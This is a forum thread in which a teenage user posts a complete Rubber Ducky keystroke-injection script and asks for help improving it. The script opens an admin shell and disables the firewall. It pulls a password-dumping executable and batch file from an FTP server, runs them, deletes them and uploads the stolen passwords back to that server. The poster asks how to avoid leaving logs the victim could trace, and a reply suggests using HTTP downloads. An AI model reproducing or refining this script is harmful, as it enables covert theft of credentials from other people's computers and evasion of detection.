contrix_ Posted May 2, 2017 Posted May 2, 2017 (edited) At first: I´m sorry for my bad English, I´m only 14 and german ^^ So I just wrote this Rubber Ducky Script that downloads a .exe and a .bat from my FTP Server. Then it executes the .exe with the .bat file what creates a .txt file with all the passwords of the victim (of course me when I forgot my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too.). Here´s the script: DELAY 1000 REM REM start cmd REM REM GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 STRING Alt j DELAY 1000 REM REM REM disable firewall REM REM STRING netsh advfirewall set currentprofile state off ENTER DELAY 500 REM color unreadable REM STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM REM REM download FTP REM STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 500 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET i.exe ENTER DELAY 8000 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET r.bat ENTER DELAY 800 STRING by ENTER DELAY 500 REM REM REM PASSWORD STEAL REM REM REM STRING cd C:\ ENTER DELAY 500 STRING r.bat ENTER DELAY 10000 STRING del r.bat ENTER DELAY 500 STRING del i.exe ENTER REM REM REM REM UPLOAD REM REM REM REM DELAY 500 STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 1000 STRING lcd c:\ ENTER DELAY 100 STRING ascii ENTER DELAY 100 DELAY 800 STRING put p.txt ENTER DELAY 500 STRING bye ENTER DELAY 300 STRING del c:\p.txt ENTER DELAY 200 STRING netsh advfirewall set currentprofile state on ENTER I´m right now working on decreasing the delays, but the download and upload delays are hard to time because it obviously depends on the internet speed the victim has. My ideas to improve this script: Leave the first FTP windows open so I don´t need to log in again(Cons: 1.I could get thrown out of the session after some time 2. I probably wouldn´t be able to switch with ALT + TAB because I don´t what other windows the victims has open) My question: Does this leave something like a log file? So that the victim could trace me back? If so, where would it be located? Do you guys have some suggestions? I would love to hear them :D Disclaimer: I can´t put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically cheap RubberDucky) which cannot be used as a Twin Duck. Thanks for your answers, contrix_ Edit: This is the batchfile: i /stext p.txt Disclaimer 2: Everything works fine without any problems. Edited May 2, 2017 by contrix_ Grammar Quote
ThoughtfulDev Posted May 3, 2017 Posted May 3, 2017 You could download your files via HTTP rather than FTP. So that you dont have to enter your credentials for downloading. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.